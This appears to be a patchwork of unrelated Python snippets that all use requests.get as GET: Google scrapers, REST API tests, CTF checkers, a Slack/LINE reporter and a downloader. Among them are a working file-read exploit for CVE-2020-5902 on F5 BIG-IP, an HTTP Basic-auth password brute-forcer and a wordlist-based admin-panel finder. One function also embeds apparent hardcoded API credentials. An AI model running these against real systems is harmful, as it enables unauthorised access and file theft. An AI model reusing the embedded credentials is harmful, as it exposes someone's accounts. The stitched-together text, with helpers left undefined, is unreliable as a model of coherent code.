def test_genbank_extension(self):
    headers = self.headers
    url = self.run_url
    # Create an empty block to attach the imported sequence to.
    block1 = {
        "metadata": {"authors": [], "version": "0.0.0", "tags": {}},
        "options": [],
        "components": [],
        "rules": {},
        "notes": {}
    }
    res = POST(self.api_url + "block", data=json(block1), headers=headers)
    block_id = res.json()["id"]
    # Run the genbank_to_block extension against a sample GenBank file.
    input1 = {
        "genbank": "extensions/compute/genbank_to_block/sequence.gb",
        "sequence": "/api/file/block/" + block_id + "/sequence"
    }
    res = POST(url + "genbank_to_block", data=json(input1), headers=headers)
    self.assertTrue(res.status_code == 200)
    res = res.json()
    self.assertTrue("block" in res)
    # Point the converted block at the uploaded sequence and save it.
    block = parse(res["block"])
    block["sequence"]["url"] = input1["sequence"]
    res = PUT(self.api_url + "block/" + block_id, data=json(block), headers=headers)
    self.assertTrue(res.status_code == 200)
    res = GET(self.api_url + "block/" + block_id, headers=headers)
    self.assertTrue(res.status_code == 200)
    self.assertTrue(res.json()["id"] == block_id)
    self.assertTrue(res.json()["sequence"]["url"] == input1["sequence"])
    # The sequence file itself should be retrievable and non-trivial in size.
    res = GET(self.api_url + "file/block%2f" + block_id + "%2fsequence", headers=headers)
    self.assertTrue(res.status_code == 200)
    self.assertTrue(len(res.text) > 1000)
def idou(file, ext):
    # `keyword` and `folder_name` are module-level globals.
    # Search Google for the file name plus the keyword and show the top snippets.
    html = GET("https://www.google.co.jp/search?q={0} {1}".format(file, keyword)).text
    bs = BeautifulSoup(html, 'lxml')
    print("\n" + "-" * 15 + file + "-" * 15)
    for result in bs.find_all(class_="BNeawe vvjwJb AP7Wnd")[:4]:
        print(result.getText().strip())
    for el in bs.select("h3.r a"):
        print(el.get_text())
    add_name = input()
    if add_name == "a":
        # "a" means the snippets were not enough: open the search in a browser
        # and ask again for the prefix to use.
        webbrowser.open("https://www.google.co.jp/search?q={0}+{1}".format(file, keyword))
        add_name = input()
    os.rename("{0}/{1}{2}".format(folder_name, file, ext),
              "{0}/[{1}] {2}{3}".format(folder_name, add_name, file, ext))
def google_search(word):
    htmlfile = GET("https://www.google.co.jp/search?q=" + word).text
    soup = BeautifulSoup(htmlfile, "lxml")
    pages = soup.find_all("h3", class_="r")
    # Print the title and link of the first three results.
    for page in pages[:3]:
        print("----------------------\n\r[" + page.a.text + "]\n\r[" + page.a.get("href") + "]")
def collect_things(endpoint):
    # Follow RFC 5988 "Link" headers to walk every page of a paginated API.
    parameters = {"per_page": 100}
    response = GET(endpoint, params=parameters)
    link_headers = parseLinkHeader(response.headers)
    things = response.json()
    while 'next' in link_headers:
        response = GET(link_headers['next'], params=parameters)
        link_headers = parseLinkHeader(response.headers)
        things = things + response.json()
    return things
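# parseLinkHeader is not shown in this snippet; below is a minimal sketch,
# assuming GitHub-style headers of the form
#   <https://api.example.com/things?page=2>; rel="next", <...>; rel="last".
# The body is an assumption, not the original helper.
def parseLinkHeader(headers):
    links = {}
    for part in headers.get('Link', '').split(','):
        pieces = part.split(';')
        if len(pieces) < 2:
            continue
        url = pieces[0].strip().strip('<>')
        for piece in pieces[1:]:
            key, _, value = piece.strip().partition('=')
            if key == 'rel':
                links[value.strip('"')] = url
    return links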
def request_extra(self, url: str, with_custom_proxy=False, proxy: str = None) -> Response:
    """
    Same functionality as the request method, but it fetches the data from an
    arbitrary url rather than the predefined one.

    :param url: target url
    :param with_custom_proxy: boolean to turn on a custom proxy stored in the resources folder
    :param proxy: if None, no explicit proxy will be used
    :return: Response object
    """
    if proxy is not None:
        return GET(url, proxies={"https": "https://" + proxy})
    return GET(url, proxies={"https": self.selected_proxy} if with_custom_proxy else None)
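# A possible call site for request_extra, assuming an instance named
# `scraper` and a placeholder proxy address (both illustrative, not from
# the original code):
# response = scraper.request_extra("https://example.com", proxy="127.0.0.1:8080")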
def get(self, request, *args, **kwargs):
    host = request.get_host()
    protocol = 'https://' if request.is_secure() else 'http://'
    url = protocol + host + str(reverse_lazy('collaborate:get_user', kwargs=kwargs))
    data = GET(url).json()
    groups = data['groups']
    # Find the index of the user's "personal" group, if any.
    personal_index = 0
    for group in groups:
        if 'personal' in group['name'].lower():
            break
        personal_index += 1
    # Pop the personal group out of the list; the return inside finally
    # swallows the IndexError raised when no personal group exists.
    personal = None
    try:
        personal = groups.pop(personal_index)
    finally:
        return render(request,
                      template_name='work_area.html',
                      context={'groups': groups, 'personal': personal})
def read():
    latest = GET('http://pastebin.com/archive').content
    soup = BeautifulSoup(latest, "lxml")
    table = soup.select('table.maintable')
    links = table[0].findAll('a')
    # Short hrefs are the paste links themselves; longer ones are navigation.
    urls = [link['href'] for link in links if len(link['href']) < 10]
    return urls
def GetHomePage(self):
    # Re-download the page if it has never been cached, or if the cached
    # copy is at least a day old.
    if not exists(self.path) or "day" in core.CompareFile(self.path):
        response = GET(self.URL, headers=self.headers)
        content = self._parse_html(response.text)
        content = core.InjectFavIcon(content, 'netflix')
        with open(self.path, mode="w") as f:
            f.write(content)
    return '/'.join(self.path.split("/")[2::])
def call_api(id):
    try:
        return {
            'id': id,
            'content': GET(f"{getenv('URL_WEB_SERVICE')}{id}").content
        }
    except Exception as e:
        # Note: the exception object is returned rather than raised.
        return e
def test_foundry_api(self):
    headers = self.headers
    url = self.foundry_url
    res = GET(url + "inventory/ecoli", headers=headers)
    self.assertTrue(res.status_code == 200)
    res = res.json()
    self.assertTrue(len(res["blocks"]) > 4000)
def get_http_content(data_type, key_id):
    response = GET('http://3ss.mobvista.com/track/' + data_type + '/orm/' + key_id,
                   params={"client_id": "qXJSJzzsGDPdYXR1"},
                   headers={"Authorization": "Basic Ozg5P5nB8qegPBhH"})
    json_obj = json.loads(response.content)
    if data_type == 'inject_code':
        return json_obj['code']
    return json.dumps(json_obj, indent=4, sort_keys=True)
def get(host, flagid, flag, vuln):
    # Checker "get" action: fetch the flag back and grade the service state.
    try:
        r = GET("http://{}:8080{}".format(host, SLA_FILENAME[vuln] + flagid))
    except Exception:
        cquit(Status.DOWN)
    if r.status_code != 200:
        cquit(Status.MUMBLE)
    if r.text.strip() == flag:
        cquit(Status.OK)
    cquit(Status.CORRUPT)
def check(host):
    try:
        r = GET("http://{}:8080/index.php".format(host))
    except Exception:
        cquit(Status.DOWN)
    if r.status_code == 200:
        cquit(Status.OK)
    cquit(Status.MUMBLE)
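# cquit and Status come from the CTF checksystem library these two checkers
# are written against; they are not defined in the snippets. A minimal
# stand-in, assuming the common checklib-style exit-code convention, might be:
import sys
from enum import Enum

class Status(Enum):
    OK = 101       # service up and flag intact
    CORRUPT = 102  # service up but flag wrong
    MUMBLE = 103   # service misbehaving
    DOWN = 104     # service unreachable

def cquit(status, public=''):
    # Report the verdict and stop the checker immediately.
    print(public)
    sys.exit(status.value)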
def Search(self, word):
    response = GET(self.SEARCH_URL + word, headers=self.headers)
    f_data = self._parse_html(response.text)
    f_data = self._change_files(f_data)
    f_data = core.InjectFavIcon(f_data, 'google')
    with open(self.search_path, mode="w") as f:
        f.write(f_data)
    return '/'.join(self.search_path.split("/")[2::])
def GetHomePage(self):
    # Same caching rule as the Netflix variant: fetch when no cached copy
    # exists or when the cache is at least a day old.
    if not exists(self.path) or "day" in core.CompareFile(self.path):
        response = GET(self.URL, headers=self.headers)
        f_data = self._parse_html(response.text)
        f_data = self._change_files(f_data)
        f_data = core.InjectFavIcon(f_data, 'google')
        with open(self.path, mode="w") as f:
            f.write(f_data)
    return '/'.join(self.path.split("/")[2::])
def test_cloning(self):
    headers = self.headers
    url = self.api_url
    proj1 = {
        "metadata": {"authors": [], "version": "0.0.0", "tags": {}},
        "components": [],
        "settings": {}
    }
    res = POST(url + "project", data=json(proj1), headers=headers)
    pid1 = res.json()['id']
    # Build a chain of clones: pid1 -> pid2 -> pid3 -> pid4.
    res = POST(url + "clone/" + pid1, headers=headers)
    pid2 = res.json()['id']
    res = POST(url + "clone/" + pid2, headers=headers)
    pid3 = res.json()['id']
    res = POST(url + "clone/" + pid3, headers=headers)
    pid4 = res.json()['id']
    res = GET(url + "project/" + pid4, headers=headers)
    # The newest clone should report its three ancestors, newest first.
    hist = GET(url + "ancestors/" + pid4, headers=headers)
    self.assertTrue(hist.status_code == 200)
    hist = hist.json()
    self.assertTrue(len(hist) == 3)
    self.assertTrue(hist[0] == pid3)
    self.assertTrue(hist[1] == pid2)
    self.assertTrue(hist[2] == pid1)
    # The original should report all its descendants, with a single leaf.
    child = GET(url + "descendants/" + pid1, headers=headers)
    self.assertTrue(child.status_code == 200)
    child = child.json()
    self.assertTrue(len(child) == 5)
    self.assertTrue(len(child['leaves']) == 1)
def send_request(url: str, user: str, passwd: str):
    # Try one user:password pair against HTTP Basic auth.
    base64_value = encode_user_passwd(user, passwd)
    headers = {"Authorization": f"Basic {base64_value}"}
    try:
        response = GET(url, headers=headers)
        printer(f"{user}:{passwd}")
        if response.status_code == 200:
            exit(f"\n{Fore.GREEN}[+] {Fore.WHITE} PASSWORD FOUND : "
                 f"{Fore.GREEN}{user} : {passwd}{Fore.WHITE}.")
    except Exception as err:
        print(err)
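# encode_user_passwd is referenced above but not shown; HTTP Basic auth
# encodes "user:password" as base64 (RFC 7617), so a plausible sketch
# (an assumption, not the original helper) is:
import base64

def encode_user_passwd(user: str, passwd: str) -> str:
    # Credentials are base64("user:password"), decoded back to str for the header.
    return base64.b64encode(f"{user}:{passwd}".encode()).decode()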
def search_google(start):
    # `query` and `rank` are module-level globals shared across result pages.
    global rank
    html = GET("https://www.google.co.jp/search?q=%s&start=%d" % (query, start)).text
    bs = BeautifulSoup(html, 'lxml')
    for el in bs.select("h3.r a"):
        title = el.get_text()
        url = dict(parse_qsl(urlparse(el.get("href")).query))["q"]
        print('%d. %s: %s' % (rank, title, url))
        rank += 1
def findAdminPanel(website):
    website = addHTTP(website)
    with open('list.txt', 'r') as f:
        content = f.read()
    # strip() (not strip("")) removes surrounding whitespace before splitting.
    panels = content.strip().split("\n")
    for panel in panels:
        combo = website + "/" + panel
        response_code = GET(combo, headers=functions._headers,
                            timeout=5, allow_redirects=False).status_code
        print(response_code)
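# addHTTP is not defined in this snippet; a minimal sketch of what it likely
# does (prefix a scheme when the target lacks one). The name comes from the
# caller above; the body is an assumption:
def addHTTP(website: str) -> str:
    if not website.startswith(("http://", "https://")):
        return "http://" + website
    return website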
def main():
    connect = MySQLdb.connect(host=HOST, db=DB, user=USER,
                              passwd=PASSWORD, charset='utf8mb4')
    cur = connect.cursor()
    # Hit the LINE@ insights endpoint for follower statistics.
    res = GET("https://api.line.me/v2/bot/insight/followers?date=" + day,
              headers=headers)
    data = json.loads(res.text)
    try:
        """
        table line_summary
            id int primary key auto_increment
            followers int default 0
            targeted_reaches int default 0
            blocks int default 0
        """
        cur.execute(
            "INSERT INTO line_summary( followers, targeted_reaches, blocks ) "
            "values ( %s, %s, %s )",
            (data['followers'], data['targetedReaches'], data['blocks']))
        connect.commit()
    except Exception as e:
        log.error(data)
        connect.rollback()
        log.error(e)
        raise e
    try:
        # Post a summary to Slack; the message reads
        # "LINE registrations: {number} / blocks: {block}".
        client = slack.WebClient(token=TOKEN)
        output = '''
```
LINE登録数:{number}件 / ブロック{block}件
```
'''.format(number=data['followers'], block=data['blocks']).strip()
        r = client.chat_postMessage(channel=TARGET, text=output)
        log.info(TARGET + ' slack update')
    except Exception as e:
        connect.rollback()
        log.error(e)
        raise e
    finally:
        log.info(' slack finished')
def send_request(ip: str, filename: str) -> str:
    # CVE-2020-5902: path traversal in the BIG-IP TMUI lets fileRead.jsp
    # return arbitrary files without authentication.
    r = GET(
        f"https://{ip}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={filename}",
        verify=False)
    try:
        data = r.json()
        output = data["output"]
    except Exception:
        # print("[-] Exploit Failed.")
        return None
    # print("[+] Exploit Successful.")
    return output
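# A typical invocation, with a placeholder target address (illustrative only,
# not from the original script):
if __name__ == "__main__":
    contents = send_request("192.0.2.1", "/etc/passwd")
    if contents:
        print(contents)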
def download_worker(self, task_id, url, path):
    with open(path, 'wb') as f, GET(url, stream=True) as rq:
        length = int(rq.headers.get('Content-Length', 0))
        self.progress.start_task(task_id)
        self.progress.update(task_id, total=length)
        # Keep the aggregate "all downloads" bar in sync with this file's size.
        self.total_length += length
        self.progress.update(self.all_t, total=self.total_length)
        for chunk in rq.iter_content(chunk_size=4096):
            f.write(chunk)
            self.progress.update(task_id, advance=len(chunk))
            self.progress.update(self.all_t, advance=len(chunk))
    return task_id
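# self.progress here matches the rich.progress.Progress API (start_task,
# update with total=/advance=). A minimal sketch of the surrounding setup,
# with the task names assumed rather than taken from the original:
from rich.progress import Progress

progress = Progress()
with progress:
    all_t = progress.add_task("all downloads", total=0)
    file_t = progress.add_task("file", start=False, total=0)
    # download_worker(file_t, url, path) would then drive both bars.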
def request(self, keywords: list, type_query: TypeQuery,
            with_custom_proxy=False, proxy: str = None) -> Response:
    """
    Returns a response for the provided parameters.

    :param keywords: list of str keywords
    :param type_query: TypeQuery used to distinguish the different queries
    :param with_custom_proxy: boolean to turn on a custom proxy stored in the resources folder
    :param proxy: if None, no explicit proxy will be used
    :return: Response object
    """
    params = self._transform_string_url(keywords, type_query)
    if proxy is not None:
        return GET(self._URL, params=params, proxies={"https": "https://" + proxy})
    return GET(self._URL, params=params,
               proxies={"https": self.selected_proxy} if with_custom_proxy else None)
def test_file_io(self):
    headers = self.headers
    url = self.api_url
    contents = "Hello World"
    # "%2f" is a URL-encoded slash, so this names the file myDir/hello.txt.
    path = "myDir%2fhello.txt"
    res = POST(url + "file/" + path, data=contents, headers=headers)
    self.assertTrue(res.status_code == 200)
    res = GET(url + "file/" + path, headers=headers)
    self.assertTrue(res.status_code == 200)
    self.assertTrue(res.text == contents)
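# Rather than hand-writing "%2f", the encoded path segment can be produced
# with the standard library (a usage sketch, not part of the original tests):
from urllib.parse import quote

path = quote("myDir/hello.txt", safe="")  # -> "myDir%2Fhello.txt"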
def root():
    username = request.args.get("username")
    client_id = env("CLIENT_ID")
    client_secret = env("CLIENT_SECRET")
    url = f"https://api.github.com/users/{username}"
    r_args = f"?client_id={client_id}&client_secret={client_secret}"
    try:
        # .text so both branches hand a string to response_class below.
        r = GET(url + r_args).text
    except Exception:
        r = "<i>Request Failed: Please try again after 2 minutes.</i>"
    response = app.response_class(response=r, status=200, mimetype="application/json")
    return response
def setUp(self):
    self.api_url = "http://0.0.0.0:3000/api/"
    self.run_url = "http://0.0.0.0:3000/exec/"
    self.foundry_url = "http://0.0.0.0:3000/foundry/"
    login = GET("http://0.0.0.0:3000/login",
                params={"user": "", "password": ""})
    self.headers = {
        "Content-type": "application/json",
        "sessionkey": login.json()["sessionkey"]
    }
def execute_get(args):
    """Perform a GET request with the given command line parameters and print
    the response to standard out.

    Args:
        args: Argparse argument object.
    """
    headers = dict(kv.split(":") for kv in args.headers)
    url = args.url
    while True:
        # Disable automatic redirects so the 301/302 handling below is reached.
        response = GET(url, headers=headers, allow_redirects=False)
        print(response if args.verbose else response.text)
        if response.status_code == 301 or response.status_code == 302:
            url = response.headers['Location'].strip()
            print('Redirecting to new url: {}'.format(url))
        else:
            break
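# execute_get expects args carrying .url, .headers and .verbose; a matching
# argparse setup (flag names assumed, not from the original CLI) could be:
import argparse

parser = argparse.ArgumentParser(description="Simple HTTP GET client")
parser.add_argument("url", help="target URL")
parser.add_argument("--headers", nargs="*", default=[],
                    help='headers as "Name:Value" pairs')
parser.add_argument("--verbose", action="store_true",
                    help="print the full response object")
execute_get(parser.parse_args())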
def draw_status(self, status, rank):
    # Draw one row of the board: rank, avatar, name, timestamp, and client.
    self.draw_text((18, 55 + self.user_rank * 26), 20, rank)
    self.img.paste(
        Image.open(
            BytesIO(GET(status.user.profile_image_url_https).content)
        ).resize((26, 26)),
        (52, 52 + self.user_rank * 26))
    self.draw_text((78, 55 + self.user_rank * 26), 20, status.user.name)
    # Tweet IDs are snowflakes: bits 22+ hold milliseconds since the Twitter
    # epoch (1288834974657), which recovers a sub-second creation time.
    self.draw_text(
        (540, 59 + self.user_rank * 26), 13,
        status.created_at.strftime('%H:%M:%S.') + "%03d" % round(
            datetime.fromtimestamp(
                ((status.id >> 22) + 1288834974657) / 1000.0).microsecond / 1000))
    self.draw_text((633, 59 + self.user_rank * 26), 13, 'via ' + status.source)
    self.user_rank += 1
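# The millisecond math above can be factored into a helper; this sketch
# illustrates the same snowflake arithmetic and is not code from the original:
from datetime import datetime

TWITTER_EPOCH_MS = 1288834974657

def snowflake_to_datetime(tweet_id: int) -> datetime:
    # The top bits of a snowflake ID are milliseconds since the Twitter epoch.
    return datetime.fromtimestamp(((tweet_id >> 22) + TWITTER_EPOCH_MS) / 1000.0)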
def call_api(id):
    try:
        save_as_pdf(id, GET(f"{getenv('URL_WEB_SERVICE')}{id}").content)
        return True
    except Exception as e:
        return e
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 24 00:13:21 2018

@author: nagano
"""
from urllib.parse import parse_qsl
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from requests import get as GET

# Replace the text after '=' with your own query; UEC is used as an example.
html = GET("https://www.google.co.jp/search?q=UEC").text
bs = BeautifulSoup(html, 'lxml')
for el in bs.select("h3.r a"):
    title = el.get_text()
    url = dict(parse_qsl(urlparse(el.get("href")).query))["q"]
    print(title)
    print(" ", url)